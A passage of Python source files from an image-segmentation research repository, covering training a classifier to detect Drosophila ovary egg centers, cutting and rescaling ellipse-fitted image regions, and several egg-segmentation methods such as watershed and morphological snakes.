bbox_inches='tight', pad_inches=0)
plt.close(fig)
def compute_min_dist_2_centers(centers, points):
""" compute distance toclosestt center and mark which center it is
:param [int, int] centers:
:param [int, int] points:
:return (float, int):
"""
dists = spatial.distance.cdist(np.array(points), np.array(centers),
metric='euclidean')
dist = np.min(dists, axis=1)
idx = np.argmin(dists, axis=1)
return dist, idx
def export_show_image_points_labels(path_out, img_name, img, seg, points,
labels=None, slic=None, seg_centers=None,
fig_suffix='', dict_label_marker=tl_visu.DICT_LABEL_MARKER):
""" export complete visualisation of labeld point over rgb image and segm
:param str path_out:
:param str img_name:
:param img: np.array
:param seg: np.array
:param [(int, int)] points:
:param [int] labels:
:param slic: np.array
:param seg_centers:
:param str fig_suffix:
:param dict_label_marker:
"""
points = np.array(points)
fig, axarr = plt.subplots(ncols=2, figsize=(9 * 2, 6))
img = img / float(np.max(img)) if np.max(img) > 1 else img
tl_visu.draw_image_segm_points(axarr[0], img, points, labels,
seg_contour=seg_centers,
lut_label_marker=dict_label_marker)
tl_visu.draw_image_segm_points(axarr[1], seg, points, labels, slic,
seg_contour=seg_centers,
lut_label_marker=dict_label_marker)
fig.tight_layout()
fig.savefig(os.path.join(path_out, img_name + fig_suffix + '.png'),
bbox_inches='tight', pad_inches=0)
plt.close(fig)
def estim_points_compute_features(name, img, segm, params):
""" determine points (center candidates) using slic
and for each compute feature vector with their names
:param str name:
:param ndarray img:
:param ndarray segm:
:param {str: any} params:
:return (str, ndarray, [(int, int)], [[float]], list(str)):
"""
# superpixels on image
assert img.shape[:2] == segm.shape[:2], \
'not matching shapes: %r : %r' % (img.shape, segm.shape)
slic = seg_spx.segment_slic_img2d(img, params['slic_size'], params['slic_regul'])
slic_centers = seg_spx.superpixel_centers(slic)
# slic_edges = seg_spx.make_graph_segm_connect_grid2d_conn4(slic)
features, feature_names = compute_points_features(segm, slic_centers,
params)
return name, slic, slic_centers, features, feature_names
def compute_points_features(segm, points, params):
""" for each point in segmentation compute relevant features according params
:param ndarray segm: segmentations
:param [(int, int)] points: positions in image
:param {str: any} params: parameters
:return ([[float]], list(str)): [[float] * nb_features] * nb_points, list(str) * nb_features
"""
features, feature_names = np.empty((len(points), 0)), list()
# segmentation histogram
if 'fts_hist_diams' in params and params['fts_hist_diams'] is not None:
features_hist, names_hist = seg_fts.compute_label_histograms_positions(
segm, points, diameters=params['fts_hist_diams'])
features = np.hstack((features, features_hist))
feature_names += names_hist
names_ray = list() # default empty, require some at leas one compute
# Ray features
if 'fts_ray_step' in params and params['fts_ray_step'] is not None:
list_features_ray = []
perform_closer = all((params.get('fts_ray_closer', False),
len(params['fts_ray_types']) > 1))
shifting = not perform_closer
for ray_edge, ray_border in params['fts_ray_types']:
features_ray, _, names_ray = seg_fts.compute_ray_features_positions(
segm, points, angle_step=params['fts_ray_step'], edge=ray_edge,
border_labels=ray_border, smooth_ray=params['fts_ray_smooth'],
shifting=shifting)
# if closer, save all in temporray array else add to feature space
if perform_closer:
list_features_ray.append(features_ray)
else:
features = np.hstack((features, features_ray))
feature_names += names_ray
# take the closest ray and then perform the shifting
if perform_closer:
features_ray = [seg_fts.shift_ray_features(ray)[0] for ray
in np.min(np.array(list_features_ray), axis=0)]
features = np.hstack((features, np.array(features_ray)))
feature_names += names_ray
return features, feature_names
def wrapper_estim_points_compute_features(name_img_segm, params):
name, img, segm = name_img_segm
return estim_points_compute_features(name, img, segm, params)
def label_close_points(centers, points, params):
""" label points whether they are close to center by distance to real center
or from annotation of close center regions
:param ndarray|[(int, int)] centers:
:param [(int, int)] points: positions in image
:param {str: any} params: parameters
:return [int]:
"""
if isinstance(centers, list):
min_dist, _ = compute_min_dist_2_centers(centers, points)
labels = (min_dist <= params['center_dist_thr'])
elif isinstance(centers, np.ndarray):
mx_points = np.array(points, dtype=int)
labels = centers[mx_points[:, 0], mx_points[:, 1]]
else:
logging.warning('not relevant centers info of type "%s"', type(centers))
labels = [-1] * len(points)
assert len(points) == len(labels), \
'not equal lenghts of points (%i) and labels (%i)' \
% (len(points), len(labels))
return labels
def wrapper_draw_export_slic_centers(args):
return export_show_image_points_labels(*args)
def dataset_load_images_segms_compute_features(params, df_paths, nb_workers=NB_WORKERS):
""" create whole dataset composed from loading input data, computing features
and label points by label whether its positive or negative center candidate
:param {str: any} params: parameters
:param DF df_paths: DataFrame
:param int nb_workers: parallel
:return dict:
"""
dict_imgs, dict_segms, dict_center = dict(), dict(), dict()
logging.info('loading input data (images, segmentation and centers)')
path_show_in = os.path.join(params['path_expt'], FOLDER_INPUT)
_wrapper_load = partial(load_image_segm_center, path_out=path_show_in,
dict_relabel=params['dict_relabel'])
iterate = tl_expt.WrapExecuteSequence(_wrapper_load, df_paths.iterrows(),
nb_workers=nb_workers,
desc='loading input data')
for name, img, seg, center in iterate:
dict_imgs[name] = img
dict_segms[name] = seg
dict_center[name] = center
dict_slics, dict_points, dict_features = dict(), dict(), dict()
logging.info('estimate candidate points and compute features')
gene_name_img_seg = ((name, dict_imgs[name], dict_segms[name])
for name in dict_imgs)
_wrapper_pnt_features = partial(wrapper_estim_points_compute_features,
params=params)
feature_names = None
iterate = tl_expt.WrapExecuteSequence(_wrapper_pnt_features,
gene_name_img_seg, nb_workers=nb_workers,
desc='estimate candidates & features')
for name, slic, points, features, feature_names in iterate:
dict_slics[name] = slic
dict_points[name] = points
dict_features[name] = features
logging.debug('computed features:\n %r', feature_names)
dict_labels = dict()
logging.info('assign labels according close distance to center')
path_points_train = os.path.join(params['path_expt'], FOLDER_POINTS_TRAIN)
tqdm_bar = tqdm.tqdm(total=len(dict_center), desc='labels assignment')
for name in dict_center:
dict_labels[name] = label_close_points(dict_center[name],
dict_points[name], params)
points = np.asarray(dict_points[name])[np.asarray(dict_labels[name]) == 1]
path_csv = os.path.join(path_points_train, name + '.csv')
tl_data.save_landmarks_csv(path_csv, points)
tqdm_bar.update()
tqdm_bar.close()
return (dict_imgs, dict_segms, dict_slics, dict_points, dict_center,
dict_features, dict_labels, feature_names)
def export_dataset_visual(path_output, dict_imgs, dict_segms, dict_slics,
dict_points, dict_labels, nb_workers=NB_WORKERS):
""" visualise complete training dataset by marking labeld points
over image and input segmentation
:param {str: ndarray} dict_imgs:
:param {str: ndarray} dict_segms:
:param {str: ndarray} dict_slics:
:param {str: ndarray} dict_points:
:param {str: ndarray} dict_labels:
:param int nb_workers: number processing in parallel
"""
logging.info('export training visualisations')
path_out = os.path.join(path_output, FOLDER_POINTS_TRAIN)
gener_args = ((path_out, name, dict_imgs[name], dict_segms[name],
dict_points[name], dict_labels[name], dict_slics[name],
None, '_train') for name in dict_imgs)
iterate = tl_expt.WrapExecuteSequence(wrapper_draw_export_slic_centers,
gener_args, nb_workers=nb_workers,
desc='exporting visualisations')
list(iterate)
def compute_statistic_centers(dict_stat, img, segm, center, slic, points, labels,
params, path_out=''):
""" compute statistic on centers
:param {str: float} dict_stat:
:param ndarray img:
:param ndarray segm:
:param center:
:param ndarray slic:
:param points:
:param labels:
:param dict params:
:param str path_out:
:return dict:
"""
labels_gt = label_close_points(center, points, params)
mask_valid = (labels_gt != -1)
points = np.asarray(points)[mask_valid, :].tolist()
labels = labels[mask_valid]
# proba = proba[mask_valid, :]
labels_gt = labels_gt[mask_valid].astype(int)
dict_stat.update(seg_clf.compute_classif_metrics(labels_gt, labels,
metric_averages=['binary']))
dict_stat['points all'] = len(labels)
dict_stat['points FP'] = np.sum(np.logical_and(labels == 1, labels_gt == 0))
dict_stat['points FN'] = np.sum(np.logical_and(labels == 0, labels_gt == 1))
# compute FP and FN to annotation
labels_fn_fp = labels.copy()
labels_fn_fp[np.logical_and(labels == 1, labels_gt == 0)] = -2
labels_fn_fp[np.logical_and(labels == 0, labels_gt == 1)] = -1
# visualise FP and FN to annotation
if os.path.isdir(path_out):
export_show_image_points_labels(path_out, dict_stat['image'], img, segm,
points, labels_fn_fp, slic, center,
'_FN-FP', tl_visu.DICT_LABEL_MARKER_FN_FP)
return dict_stat
def detect_center_candidates(name, image, segm, centers_gt, slic, points,
features, feature_names, params, path_out, classif):
""" for loaded or computer all necessary data, classify centers_gt candidates
and if we have annotation validate this results
:param str name:
:param ndarray image:
:param ndarray segm:
:param centers_gt:
:param slic: np.array
:param [(int, int)] points:
:param features:
:param list(str) feature_names:
:param dict params:
:param str path_out:
:param classif: obj
:return dict:
"""
labels = classif.predict(features)
# proba = classif.predict_proba(features)
candidates = np.asarray(points)[np.asarray(labels) == 1]
path_points = os.path.join(path_out, FOLDER_POINTS)
path_visu = os.path.join(path_out, FOLDER_POINTS_VISU)
path_csv = os.path.join(path_points, name + '.csv')
tl_data.save_landmarks_csv(path_csv, tl_data.swap_coord_x_y(candidates))
export_show_image_points_labels(path_visu, name, image, segm, points,
labels, slic, centers_gt)
dict_centers = {'image': name,
'path_points': path_csv}
if centers_gt is not None:
dict_centers = compute_statistic_centers(dict_centers, image, segm,
centers_gt, slic, points, labels,
params, path_visu)
return dict_centers
def wrapper_detect_center_candidates(data, params, path_output, classif):
name, img, segm, center, slic, points, features, feature_names = data
return detect_center_candidates(name, img, segm, center, slic, points,
features, feature_names, params,
path_output, classif)
def load_dump_data(path_dump_data):
""" loading saved data prom previous stages
:param path_dump_data:
:return dict:
"""
logging.info('loading dumped data "%s"', path_dump_data)
# with open(os.path.join(path_out, NAME_DUMP_TRAIN_DATA), 'r') as f:
# dict_data = pickle.load(f)
npz_file = np.load(path_dump_data, encoding='bytes')
dict_imgs = dict(npz_file['dict_images'].tolist())
dict_segms = dict(npz_file['dict_segms'].tolist())
dict_slics = dict(npz_file['dict_slics'].tolist())
dict_points = dict(npz_file['dict_points'].tolist())
dict_features = dict(npz_file['dict_features'].tolist())
dict_labels = dict(npz_file['dict_labels'].tolist())
dict_centers = dict(npz_file['dict_centers'].tolist())
feature_names = npz_file['feature_names'].tolist()
return (dict_imgs, dict_segms, dict_slics, dict_points, dict_centers,
dict_features, dict_labels, feature_names)
def save_dump_data(path_dump_data, imgs, segms, slics, points, centers,
features, labels, feature_names):
""" loading saved data prom previous stages """
logging.info('save (dump) data to "%s"', path_dump_data)
np.savez_compressed(path_dump_data, dict_images=imgs, dict_segms=segms,
dict_slics=slics, dict_points=points, dict_centers=centers,
dict_features=features, dict_labels=labels,
feature_names=feature_names, encoding='bytes')
def experiment_loo(classif, dict_imgs, dict_segms, dict_centers, dict_slics,
dict_points, dict_features, feature_names, params):
logging.info('run LOO prediction on training data...')
# test classif on images
gener_data = ((n, dict_imgs[n], dict_segms[n], dict_centers[n],
dict_slics[n], dict_points[n], dict_features[n],
feature_names) for n in dict_imgs)
_wrapper_detection = partial(wrapper_detect_center_candidates,
params=params, classif=classif,
path_output=params['path_expt'])
df_stat = pd.DataFrame()
iterate = tl_expt.WrapExecuteSequence(_wrapper_detection,
gener_data, nb_workers=params['nb_workers'],
desc='detect center candidates')
for dict_stat in iterate:
df_stat = df_stat.append(dict_stat, ignore_index=True)
df_stat.to_csv(os.path.join(params['path_expt'], NAME_CSV_STAT_TRAIN))
df_stat.set_index(['image'], inplace=True)
df_stat.to_csv(os.path.join(params['path_expt'], NAME_CSV_STAT_TRAIN))
logging.info('STATISTIC: \n %r', df_stat.describe().transpose())
def prepare_experiment_folder(params, dir_template):
params['path_expt'] = os.path.join(params['path_output'],
dir_template % params['name'])
if not os.path.exists(params['path_expt']):
assert os.path.isdir(os.path.dirname(params['path_expt'])), \
'missing: %s' % os.path.dirname(params['path_expt'])
logging.debug('creating missing folder: %s', params['path_expt'])
os.mkdir(params['path_expt'])
return params
def load_df_paths(params):
path_csv = os.path.join(params['path_expt'], NAME_CSV_TRIPLES)
if os.path.isfile(path_csv) and not FORCE_RELOAD:
logging.info('loading path pairs "%s"', path_csv)
df_paths = pd.read_csv(path_csv, encoding='utf-8', index_col=0)
else:
if os.path.isfile(params['path_list']):
df_paths = pd.read_csv(params['path_list'], index_col=0,
encoding='utf-8')
else:
df_paths = find_match_images_segms_centers(params['path_images'],
params['path_segms'],
params['path_centers'])
df_paths.to_csv(path_csv, encoding='utf-8')
df_paths.index = list(range(len(df_paths)))
return df_paths, path_csv
def main_train(params):
""" PIPELINE for training
0) load triplets or create triplets from path to images, annotations
1) load precomputed data or compute them now
2) train classifier with hyper-parameters
3) perform Leave-One-Out experiment
:param {str: any} params:
"""
params = prepare_experiment_folder(params, FOLDER_EXPERIMENT)
tl_expt.set_experiment_logger(params['path_expt'])
logging.info(tl_expt.string_dict(params, desc='PARAMETERS'))
tl_expt.save_config_yaml(os.path.join(params['path_expt'], NAME_YAML_PARAMS), params)
tl_expt.create_subfolders(params['path_expt'], LIST_SUBDIRS)
df_paths, _ = load_df_paths(params)
path_dump_data = os.path.join(params['path_expt'], NAME_DUMP_TRAIN_DATA)
if not os.path.isfile(path_dump_data) or FORCE_RECOMP_DATA:
(dict_imgs, dict_segms, dict_slics, dict_points, dict_centers,
dict_features, dict_labels, feature_names) = \
dataset_load_images_segms_compute_features(params, df_paths, params['nb_workers'])
assert len(dict_imgs) > 0, 'missing images'
save_dump_data(path_dump_data, dict_imgs, dict_segms, dict_slics, dict_points,
dict_centers, dict_features, dict_labels, feature_names)
else:
(dict_imgs, dict_segms, dict_slics, dict_points, dict_centers, dict_features,
dict_labels, feature_names) = load_dump_data(path_dump_data)
if is_drawing(params['path_expt']) and EXPORT_TRAINING_DATA:
export_dataset_visual(params['path_expt'], dict_imgs, dict_segms, dict_slics,
dict_points, dict_labels, params['nb_workers'])
# concentrate features, labels
features, labels, sizes = seg_clf.convert_set_features_labels_2_dataset(
dict_features, dict_labels, drop_labels=[-1], balance_type=params['balance'])
# remove all bad values from features space
features[np.isnan(features)] = 0
features[np.isinf(features)] = -1
assert np.sum(sizes) == len(labels), \
'not equal sizes (%d) and labels (%i)' \
% (int(np.sum(sizes)), len(labels))
# feature norm & train classification
nb_holdout = int(np.ceil(len(sizes) * CROSS_VAL_LEAVE_OUT_SEARCH))
cv = seg_clf.CrossValidateGroups(sizes, nb_holdout)
classif, params['path_classif'] = seg_clf.create_classif_search_train_export(
params['classif'], features, labels, cross_val=cv, params=params,
feature_names=feature_names, nb_search_iter=params['nb_classif_search'],
pca_coef=params.get('pca_coef', None), nb_workers=params['nb_workers'],
path_out=params['path_expt'])
nb_holdout = int(np.ceil(len(sizes) * CROSS_VAL_LEAVE_OUT_EVAL))
cv = seg_clf.CrossValidateGroups(sizes, nb_holdout)
seg_clf.eval_classif_cross_val_scores(params['classif'], classif, features, labels,
cross_val=cv, path_out=params['path_expt'])
seg_clf.eval_classif_cross_val_roc(params['classif'], classif, features, labels,
cross_val=cv, path_out=params['path_expt'])
if RUN_LEAVE_ONE_OUT:
experiment_loo(classif, dict_imgs, dict_segms, dict_centers, dict_slics,
dict_points, dict_features, feature_names, params)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
logging.info('run TRAINING...')
params = arg_parse_params(CENTER_PARAMS)
main_train(params)
logging.info('DONE')
```
#### File: pyImSegm/experiments_ovary_detect/run_ellipse_cut_scale.py
```python
import os
import sys
import glob
import logging
from functools import partial
import pandas as pd
import numpy as np
from skimage import transform
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
import imsegm.utilities.data_io as tl_data
import imsegm.utilities.experiments as tl_expt
import imsegm.ellipse_fitting as ell_fit
import run_ellipse_annot_match as r_match
COLUMNS_ELLIPSE = ['ellipse_xc', 'ellipse_yc',
'ellipse_a', 'ellipse_b',
'ellipse_theta']
OVERLAP_THRESHOLD = 0.45
NORM_FUNC = np.median # other options - mean, max, ...
NB_WORKERS = tl_expt.nb_workers(0.8)
PATH_IMAGES = tl_data.update_path(os.path.join('data_images', 'drosophila_ovary_slice'))
PATH_RESULTS = tl_data.update_path('results', absolute=True)
DEFAULT_PARAMS = {
'path_images': os.path.join(PATH_IMAGES, 'image', '*.jpg'),
'path_infofile': os.path.join(PATH_IMAGES, 'info_ovary_images_ellipses.csv'),
'path_output': os.path.join(PATH_RESULTS, 'cut_stages'),
}
def extract_ellipse_object(idx_row, path_images, path_out, norm_size):
""" cut the image selection according ellipse parameters
and scale it into given size to have all image in the end the same sizes
:param (int, row) idx_row: index and row with ellipse parameters
:param str path_images: path to the image folder
:param str path_out: path to output folder
:param (int, int) norm_size: output image size
"""
_, row = idx_row
# select image with this name and any extension
list_imgs = glob.glob(os.path.join(path_images, row['image_name'] + '.*'))
path_img = sorted(list_imgs)[0]
img, _ = tl_data.load_image_2d(path_img)
# create mask according to chosen ellipse
ell_params = row[COLUMNS_ELLIPSE].tolist()
mask = ell_fit.add_overlap_ellipse(np.zeros(img.shape[:2], dtype=int),
ell_params, 1)
# cut the particular image
img_cut = tl_data.cut_object(img, mask, 0, use_mask=True, bg_color=None)
# scaling according to the normal size
img_norm = transform.resize(img_cut, norm_size)
path_img = os.path.join(path_out, os.path.basename(path_img))
tl_data.export_image(path_img, img_norm)
def perform_stage(df_group, stage, path_images, path_out):
""" perform cutting images for a particular development stage
and nom them into common image size
:param df_group: input dataframe with ellipse parameters
:param int stage: index of development stage
:param str path_images: path to the image folder
:param str path_out: path to the output folder
"""
logging.info('stage %i listing %i items' % (stage, len(df_group)))
stat_a = NORM_FUNC(df_group['ellipse_a'])
stat_b = NORM_FUNC(df_group['ellipse_b'])
norm_size = (int(stat_b), int(stat_a))
logging.info('normal dimension is %r' % norm_size)
path_out_stage = os.path.join(path_out, str(stage))
if not os.path.isdir(path_out_stage):
os.mkdir(path_out_stage)
_wrapper_object = partial(extract_ellipse_object, path_images=path_images,
path_out=path_out_stage, norm_size=norm_size)
desc = 'stage %i - size %s' % (stage, norm_size)
iterate = tl_expt.WrapExecuteSequence(_wrapper_object, df_group.iterrows(),
nb_workers=params['nb_workers'],
desc=desc)
list(iterate)
def main(params):
""" PIPELINE for matching
:param {str: str} params:
"""
# tl_expt.set_experiment_logger(params['path_expt'])
# tl_expt.create_subfolders(params['path_expt'], LIST_SUBDIRS)
logging.info(tl_expt.string_dict(params, desc='PARAMETERS'))
if not os.path.isdir(params['path_output']):
os.mkdir(params['path_output'])
df_info = pd.read_csv(params['path_infofile'], index_col=0)
df_info = r_match.filter_table(df_info, params['path_images'])
df_info.dropna(inplace=True)
df_info = df_info[df_info['ellipse_Jaccard'] >= OVERLAP_THRESHOLD]
logging.info('filtered %i item in table' % len(df_info))
# execute over groups per stage
path_dir_imgs = os.path.dirname(params['path_images'])
for stage, df_stage in df_info.groupby('stage'):
perform_stage(df_stage, stage, path_dir_imgs, params['path_output'])
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
logging.info('running...')
params = r_match.arg_parse_params(DEFAULT_PARAMS)
main(params)
logging.info('DONE')
```
#### File: pyImSegm/experiments_ovary_detect/run_ovary_egg-segmentation.py
```python
import os
import sys
import time
import argparse
import logging
import pickle
from functools import partial
import matplotlib
if os.environ.get('DISPLAY', '') == '' and matplotlib.rcParams['backend'] != 'agg':
print('No display found. Using non-interactive Agg backend.')
matplotlib.use('Agg')
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy import ndimage
from skimage import segmentation, morphology
from skimage import measure, draw
# from sklearn.externals import joblib
# from sklearn import metrics, cross_validation
from skimage.measure.fit import EllipseModel
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
import imsegm.utilities.data_io as tl_data
import imsegm.utilities.experiments as tl_expt
import imsegm.utilities.drawing as tl_visu
import imsegm.superpixels as seg_spx
import imsegm.region_growing as seg_rg
import imsegm.ellipse_fitting as ell_fit
from morphsnakes import morphsnakes, multi_snakes
# from libs import chanvese
NB_WORKERS = tl_expt.nb_workers(0.8)
NAME_EXPERIMENT = 'experiment_egg-segment'
TYPE_LOAD_IMAGE = '2d_struct'
DIR_VISUAL_POSIX = '___visu'
DIR_CENTRE_POSIX = '___centres'
DIR_DEBUG_POSIX = '___debug'
# setting default file names
NAME_FIG_LABEL_HISTO = 'fig_histo_annot_segments.png'
NAME_CSV_SEGM_STAT_SLIC_ANNOT = 'statistic_segm_slic_annot.csv'
NAME_CSV_SEGM_STAT_RESULT = 'statistic_segm_results.csv'
NAME_CSV_SEGM_STAT_RESULT_GC = 'statistic_segm_results_gc.csv'
EACH_UNIQUE_EXPERIMENT = False
INIT_MASK_BORDER = 50.
# minimal diameter for estimating ellipse
MIN_ELLIPSE_DAIM = 25.
# subfigure size for experting images
MAX_FIGURE_SIZE = 14
# threshold if two segmentation overlap more, keep just one of them
SEGM_OVERLAP = 0.5
# paramters for SLIC segmentation
SLIC_SIZE = 40
SLIC_REGUL = 0.3
# Region Growing configuration
DEBUG_EXPORT = False
RG2SP_THRESHOLDS = { # thresholds for updating between iterations
'centre': 20,
'shift': 10,
'volume': 0.05,
'centre_init': 50
}
COLUMNS_ELLIPSE = ('xc', 'yc', 'a', 'b', 'theta')
PATH_DATA = tl_data.update_path('data_images', absolute=True)
PATH_IMAGES = os.path.join(PATH_DATA, 'drosophila_ovary_slice')
# sample segmentation methods
LIST_SAMPLE_METHODS = (
'ellipse_moments', 'ellipse_ransac_mmt', 'ellipse_ransac_crit',
'GC_pixels-large', 'GC_pixels-shape', 'GC_slic-large', 'GC_slic-shape',
'rg2sp_greedy-mixture', 'rg2sp_GC-mixture',
'watershed_morph'
)
# default segmentation configuration
SEGM_PARAMS = {
# ovary labels: background, funicular cells, nurse cells, cytoplasm
'tab-proba_ellipse': [0.01, 0.95, 0.95, 0.85],
'tab-proba_graphcut': [0.01, 0.6, 0.99, 0.75],
'tab-proba_RG2SP': [0.01, 0.6, 0.95, 0.75],
'path_single-model': os.path.join(PATH_DATA, 'RG2SP_eggs_single-model.pkl'),
'path_multi-models': os.path.join(PATH_DATA, 'RG2SP_eggs_mixture-model.pkl'),
'gc-pixel_regul': 3.,
'gc-slic_regul': 2.,
'RG2SP-shape': 5.,
'RG2SP-pairwise': 3.,
'RG2SP-swap': True,
'label_trans': [0.1, 0.03],
'overlap_theshold': SEGM_OVERLAP,
'RG2SP_theshold': RG2SP_THRESHOLDS,
'slic_size': SLIC_SIZE,
'slic_regul': SLIC_REGUL,
'path_list': os.path.join(PATH_IMAGES,
'list_imgs-segm-center-points_short.csv'),
'path_out': tl_data.update_path('results', absolute=True)
}
def arg_parse_params(params):
"""
SEE: https://docs.python.org/3/library/argparse.html
:return {str: str}:
"""
parser = argparse.ArgumentParser()
parser.add_argument('-list', '--path_list', type=str, required=False,
help='path to the list of image',
default=params['path_list'])
parser.add_argument('-out', '--path_out', type=str, required=False,
help='path to the output directory',
default=params['path_out'])
parser.add_argument('-n', '--name', type=str, required=False,
help='name of the experiment', default='ovary')
parser.add_argument('-cfg', '--path_config', type=str, required=False,
help='path to the configuration', default=None)
parser.add_argument('--nb_workers', type=int, required=False, default=NB_WORKERS,
help='number of processes in parallel')
parser.add_argument('-m', '--methods', type=str, required=False, nargs='+',
help='list of segment. methods', default=None)
arg_params = vars(parser.parse_args())
params.update(arg_params)
if not isinstance(arg_params['path_config'], str) \
or arg_params['path_config'].lower() == 'none':
params['path_config'] = ''
else:
params['path_config'] = tl_data.update_path(params['path_config'])
assert os.path.isfile(params['path_config']), \
'missing file: %s' % params['path_config']
ext = os.path.splitext(params['path_config'])[-1]
assert (ext == '.yaml' or ext == '.yml'), \
'"%s" should be YAML file' % os.path.basename(params['path_config'])
data = tl_expt.load_config_yaml(params['path_config'])
params.update(data)
params.update(arg_params)
for k in (k for k in arg_params if 'path' in k):
if not arg_params[k]:
continue
params[k] = tl_data.update_path(arg_params[k], absolute=True)
assert os.path.exists(params[k]), 'missing: %s' % params[k]
# load saved configuration
logging.info('ARG PARAMETERS: \n %r', params)
return params
def load_image(path_img, img_type=TYPE_LOAD_IMAGE):
""" load image from given path according specification
:param str path_img:
:param str img_type:
:return ndarray:
"""
path_img = os.path.abspath(os.path.expanduser(path_img))
assert os.path.isfile(path_img), 'missing: "%s"' % path_img
if img_type == 'segm':
img = tl_data.io_imread(path_img)
elif img_type == '2d_struct':
img, _ = tl_data.load_img_double_band_split(path_img)
assert img.ndim == 2, 'image can be only single color'
else:
logging.error('not supported loading img_type: %s', img_type)
img = tl_data.io_imread(path_img)
logging.debug('image shape: %r, value range %f - %f', img.shape,
img.min(), img.max())
return img
def path_out_img(params, dir_name, name):
return os.path.join(params['path_exp'], dir_name, name + '.png')
def export_draw_image_segm(path_fig, img, segm=None, segm_obj=None, centers=None):
""" draw and export visualisation of image and segmentation
:param str path_fig: path to the exported figure
:param ndarray img:
:param ndarray segm:
:param ndarray segm_obj:
:param ndarray centers:
"""
size = np.array(img.shape[:2][::-1], dtype=float)
fig, ax = plt.subplots(figsize=(size / size.max() * MAX_FIGURE_SIZE))
ax.imshow(img, alpha=1., cmap=plt.cm.Greys)
if segm is not None:
ax.contour(segm)
if segm_obj is not None:
ax.imshow(segm_obj, alpha=0.1)
assert len(np.unique(segm_obj)) < 1e2, \
'too many labeled objects - %i' % len(np.unique(segm_obj))
ax.contour(segm_obj, levels=np.unique(segm_obj).tolist(),
cmap=plt.cm.jet_r, linewidths=(10, ))
if centers is not None:
ax.plot(np.array(centers)[:, 1], np.array(centers)[:, 0], 'o', color='r')
fig = tl_visu.figure_image_adjustment(fig, img.shape)
fig.savefig(path_fig)
plt.close(fig)
def segment_watershed(seg, centers, post_morph=False):
""" perform watershed segmentation on input imsegm
and optionally run some postprocessing using morphological operations
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param bool post_morph: apply morphological postprocessing
:return ndarray, [[int, int]]: resulting segmentation, updated centres
"""
logging.debug('segment: watershed...')
seg_binary = (seg > 0)
seg_binary = ndimage.morphology.binary_fill_holes(seg_binary)
# thr_area = int(0.05 * np.sum(seg_binary))
# seg_binary = morphology.remove_small_holes(seg_binary, min_size=thr_area)
distance = ndimage.distance_transform_edt(seg_binary)
markers = np.zeros_like(seg)
for i, pos in enumerate(centers):
markers[int(pos[0]), int(pos[1])] = i + 1
segm = morphology.watershed(-distance, markers, mask=seg_binary)
# if morphological postprocessing was not selected, ends here
if not post_morph:
return segm, centers, None
segm_clean = np.zeros_like(segm)
for lb in range(1, np.max(segm) + 1):
seg_lb = (segm == lb)
# some morphology operartion for cleaning
seg_lb = morphology.binary_closing(seg_lb, selem=morphology.disk(5))
seg_lb = ndimage.morphology.binary_fill_holes(seg_lb)
# thr_area = int(0.15 * np.sum(seg_lb))
# seg_lb = morphology.remove_small_holes(seg_lb, min_size=thr_area)
seg_lb = morphology.binary_opening(seg_lb, selem=morphology.disk(15))
segm_clean[seg_lb] = lb
return segm_clean, centers, None
def create_circle_center(img_shape, centers, radius=10):
""" create initialisation from centres as small circles
:param img_shape:
:param [[int, int]] centers:
:param int radius:
:return:
"""
mask_circle = np.zeros(img_shape, dtype=int)
mask_perimeter = np.zeros(img_shape, dtype=int)
center_circles = list()
for i, pos in enumerate(centers):
rr, cc = draw.circle(int(pos[0]), int(pos[1]), radius,
shape=img_shape[:2])
mask_circle[rr, cc] = i + 1
rr, cc = draw.circle_perimeter(int(pos[0]), int(pos[1]), radius,
shape=img_shape[:2])
mask_perimeter[rr, cc] = i + 1
center_circles.append(np.array([rr, cc]).transpose())
return center_circles, mask_circle, mask_perimeter
def segment_active_contour(img, centers):
""" segmentation using acive contours
:param ndarray img: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
logging.debug('segment: active_contour...')
# http://scikit-image.org/docs/dev/auto_examples/edges/plot_active_contours.html
segm = np.zeros(img.shape[:2])
img_smooth = ndimage.filters.gaussian_filter(img, 5)
center_circles, _, _ = create_circle_center(img.shape[:2], centers)
for i, snake in enumerate(center_circles):
snake = segmentation.active_contour(img_smooth, snake.astype(float),
alpha=0.015, beta=10, gamma=0.001,
w_line=0.0, w_edge=1.0,
max_px_move=1.0,
max_iterations=2500,
convergence=0.2)
seg = np.zeros(segm.shape, dtype=bool)
x, y = np.array(snake).transpose().tolist()
# rr, cc = draw.polygon(x, y)
seg[map(int, x), map(int, y)] = True
seg = morphology.binary_dilation(seg, selem=morphology.disk(3))
bb_area = int((max(x) - min(x)) * (max(y) - min(y)))
logging.debug('bounding box area: %d', bb_area)
seg = morphology.remove_small_holes(seg, min_size=bb_area)
segm[seg] = i + 1
return segm, centers, None
def segment_morphsnakes(img, centers, init_center=True, smoothing=5,
lambdas=(3, 3), bb_dist=INIT_MASK_BORDER):
""" segmentation using morphological snakes with some parameters
:param ndarray img: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param bool init_center:
:param int smoothing:
:param [int, int] lambdas:
:param float bb_dist:
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
logging.debug('segment: morph-snakes...')
if img.ndim == 3:
img = img[:, :, 0]
if init_center:
_, mask, _ = create_circle_center(img.shape[:2], centers, radius=15)
else:
mask = np.zeros_like(img, dtype=int)
mask[bb_dist:-bb_dist, bb_dist:-bb_dist] = 1
# Morphological ACWE. Initialization of the level-set.
params = dict(smoothing=smoothing, lambda1=lambdas[0], lambda2=lambdas[1])
ms = multi_snakes.MultiMorphSnakes(img, mask, morphsnakes.MorphACWE, params)
diag = np.sqrt(img.shape[0] ** 2 + img.shape[1] ** 2)
ms.run(int(diag / 2.))
segm = ms.levelset
return segm, centers, None
# def segment_chanvese(img, centers, init_center=False, bb_dist=INIT_MASK_BORDER):
# logging.debug('segment: chanvese...')
# if img.ndim == 3:
# img = img[:, :, 0]
# if init_center:
# _, mask, _ = create_circle_center(img.shape[:2], centers, radius=20)
# init_mask = (mask > 0).astype(int)
# else:
# init_mask = np.zeros_like(img, dtype=int)
# init_mask[bb_dist:-bb_dist, bb_dist:-bb_dist] = 1
# nb_iter = int(sum(img.shape))
